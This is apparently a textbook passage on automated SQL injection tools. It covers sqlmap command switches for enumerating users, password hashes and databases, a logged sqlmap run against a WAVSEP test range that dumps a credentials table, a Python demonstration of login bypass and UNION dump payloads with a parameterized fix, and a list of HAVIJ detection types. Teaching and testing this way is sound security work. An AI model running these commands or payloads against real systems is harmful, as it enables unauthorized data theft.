1. sqlmap
sqlmap is a free, open-source tool for detecting and exploiting SQL injection vulnerabilities. Its standout feature is that detection and exploitation are automated end to end (database fingerprinting, access to the underlying file system, command execution). The sqlmap source can be downloaded from the project's official site on SourceForge (see Figure 4-10): http://sourceforge.net/projects/sqlmap/ .
Figure 4-10 sqlmap interface
It can also be obtained with git:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Common sqlmap commands (the long switches are spelled with two hyphens; the enumeration switches for users, columns, tables and databases are upper-case -U/-C/-T/-D, while lower-case -u is the target URL and -c/-t/-d mean config file, traffic log and direct database connection):
sqlmap -u "http://url/news?Id=1" --dbms "mysql" --users    # --dbms forces the back-end DBMS type instead of fingerprinting it
sqlmap -u "http://url/news?Id=1" --users                   # enumerate database users
sqlmap -u "http://url/news?Id=1" --dbs                     # enumerate databases
sqlmap -u "http://url/news?Id=1" --passwords               # enumerate database user password hashes
sqlmap -u "http://url/news?Id=1" --passwords -U root -v 0  # password hash of the named user only
sqlmap -u "http://url/news?Id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20  # dump the named columns of one table, entries 1 to 20
sqlmap -u "http://url/news?Id=1" --dump-all -v 0           # dump every table of every database
sqlmap -u "http://url/news?Id=1" --privileges              # enumerate user privileges
sqlmap -u "http://url/news?Id=1" --privileges -U root      # privileges of the named user
sqlmap -u "http://url/news?Id=1" --is-dba -v 1             # is the current database user a DBA?
sqlmap -u "http://url/news?Id=1" --roles                   # enumerate database user roles
sqlmap -u "http://url/news?Id=1" --udf-inject              # inject user-defined functions (a route to OS command execution, i.e. system-level access)
sqlmap -u "http://url/news?Id=1" --dump-all --exclude-sysdbs -v 0  # dump all tables of all databases, skipping the DBMS system databases
sqlmap -u "http://url/news?Id=1" --union-cols 1-10         # range of column counts to try for UNION-based injection (1-10 is an example range)
sqlmap -u "http://url/news?Id=1" --cookie "cookie_value"   # send this Cookie header; add --level 2 if the cookie parameters themselves should be tested for injection
sqlmap -u "http://url/news?Id=1" -b                        # retrieve the DBMS banner
sqlmap -u "http://url/news?Id=1" --data "id=3"             # POST injection: parameters sent in the request body
sqlmap -u "http://url/news?Id=1" -v 1 -f                   # extensive DBMS fingerprint
The WAVSEP test range serves to demonstrate what sqlmap can do. The link with the SQL injection vulnerability is:
http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2
The injection point is the username parameter.
· Identify the database type:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username
Result:
[10:45:03] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0
[10:45:03] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'
· Enumerate the database users:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --users
Result:
database management system users [1]:
[*] 'wavsep'@'localhost'

[10:51:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[10:51:26] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

[*] shutting down at 10:51:26
· Enumerate the databases:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --dbs
Result:
[10:54:51] [INFO] fetching database names
[10:54:52] [INFO] the SQL query used returns 2 entries
[10:54:52] [INFO] retrieved: information_schema
[10:54:52] [INFO] retrieved: wavsepDB
available databases [2]:
[*] information_schema
[*] wavsepDB
· Dump the full contents of one table in one database:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB -T users --dump
Result:
Database: wavsepDB
Table: users
[7 entries]
+--------+----------+------------+-----------+
| userid | username | password   | privilege |
+--------+----------+------------+-----------+
| 1      | user1    | password   | 1         |
| 2      | david    | goodboy    | 1         |
| 3      | admin    | mastermold | 5         |
| 4      | user4    | password4  | 1         |
| 5      | user5    | password5  | 2         |
| 6      | user6    | password6  | 1         |
| 7      | user7    | password7  | 1         |
+--------+----------+------------+-----------+

[11:10:05] [INFO] table 'wavsepDB.users' dumped to CSV file '/Users/liu.yan/.sqlmap/output/182.61.11.23/dump/wavsepDB/users.csv'
[11:10:05] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

[*] shutting down at 11:10:05
· Dump the full contents of one database:
./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB --dump-all -v 0
Result:
[11:05:30] [INFO] resumed: 8
Database: wavsepDB
Table: transactions
[8 entries]
+--------+---------------+-------+-----------------------+-----------------+
| userid | transactionId | sum   | description           | transactionDate |
+--------+---------------+-------+-----------------------+-----------------+
| 1      | 132           | 1000  | Simple Transaction    | 2010-01-01      |
| 2      | 133           | 1200  | Simple Transaction    | 2010-01-01      |
| 3      | 135           | 3000  | Simple Transaction    | 2010-01-01      |
| 4      | 223           | 4000  | Simple Transaction    | 2010-01-01      |
| 5      | 423           | 5000  | Simple Transaction    | 2010-01-01      |
| 6      | 456           | 6000  | Simple Transaction    | 2010-01-01      |
| 7      | 789           | 7012  | Expensive Transaction | 2010-01-01      |
| 8      | 895           | 8000  | Expensive Transaction | 2010-02-02      |
+--------+---------------+-------+-----------------------+-----------------+

[*] shutting down at 11:05:30
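What sqlmap automated in the steps above can be reproduced by hand against a stand-in for the vulnerable login page. The Python below is an added example, not code from WAVSEP or sqlmap: it builds an in-memory SQLite table seeded with the rows the users dump returned, writes the login query the way the WAVSEP case does (string concatenation on the username parameter) next to a parameterized version, and then runs the three things sqlmap did: error-based detection (the unbalanced quote that produced the 500 responses), the UNION column-count search that --union-cols tunes, and a UNION dump of username and password. Function and table names are the example's own assumptions; the comment terminator is written as "-- " with a trailing space because MySQL, unlike SQLite, requires it.

```python
import sqlite3

# Constructed sample data: the rows the sqlmap dump of wavsepDB.users returned.
USERS = [
    (1, "user1", "password", 1),
    (2, "david", "goodboy", 1),
    (3, "admin", "mastermold", 5),
    (4, "user4", "password4", 1),
    (5, "user5", "password5", 2),
    (6, "user6", "password6", 1),
    (7, "user7", "password7", 1),
]


def make_db():
    """In-memory stand-in for wavsepDB (hypothetical schema, same columns as the dump)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userid INTEGER, username TEXT, password TEXT, privilege INTEGER)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The injectable pattern: user input concatenated into the SQL text.
    A malformed query raises sqlite3.Error, which is what the JSP page turned
    into an HTTP 500."""
    sql = (
        "SELECT username, privilege FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_fixed(conn, username, password):
    """Same query with bound parameters: the input can never change the SQL structure."""
    sql = "SELECT username, privilege FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def is_injectable(conn, login):
    """Error-based detection as used on this WAVSEP case: one unbalanced quote must
    break the query, while a doubled (escaped) quote must not."""
    def errors(payload):
        try:
            login(conn, payload, "x")
            return False
        except sqlite3.Error:
            return True
    return errors("textvalue'") and not errors("textvalue''")


def find_union_columns(conn, login, max_cols=10):
    """What --union-cols narrows down: append UNION SELECT NULL,... with a growing
    number of NULLs until the query runs and the injected all-NULL row appears."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ", ".join(["NULL"] * n) + " -- "
        try:
            rows = login(conn, payload, "x")
        except sqlite3.Error:
            continue
        if (None,) * n in rows:
            return n
    return None


def dump_via_union(conn, login, table="users", cols=("username", "password")):
    """The UNION technique behind --dump: ride the two result columns of the login
    query to read arbitrary columns of another table."""
    payload = "' UNION SELECT " + ", ".join(cols) + " FROM " + table + " -- "
    return login(conn, payload, "x")


if __name__ == "__main__":
    conn = make_db()
    for name, login in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        print(name, "injectable:", is_injectable(conn, login))
        print(name, "login bypass rows:", login(conn, "' OR 1=1 -- ", "x"))
        print(name, "union columns:", find_union_columns(conn, login))
        print(name, "dump:", dump_via_union(conn, login))
```

Against the vulnerable function the bypass payload returns all seven accounts, the column search stops at 2 (the login query selects two columns), and the UNION dump yields every username/password pair, which is exactly the table sqlmap printed. Against the parameterized function every payload is treated as a literal username, so nothing errors, nothing matches, and the column search returns None.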
2. HAVIJ
HAVIJ is an automated SQL injection tool (its interface is shown in Figure 4-11) that helps penetration testers find and exploit SQL injection vulnerabilities in web applications.
Figure 4-11 HAVIJ interface
Supported detection types include:
·MSSQL 2000/2005 with error;
·MSSQL 2000/2005 no-error union-based;
·MSSQL blind;
·MSSQL time-based;
·MySQL union-based;
·MySQL blind;
·MySQL error-based;
·MySQL time-based;
·Oracle union-based;
·Oracle error-based;
·Oracle blind;
·PostgreSQL union-based;
·MS Access union-based;
·MS Access blind;
·Sybase (ASE);
·Sybase (ASE) blind.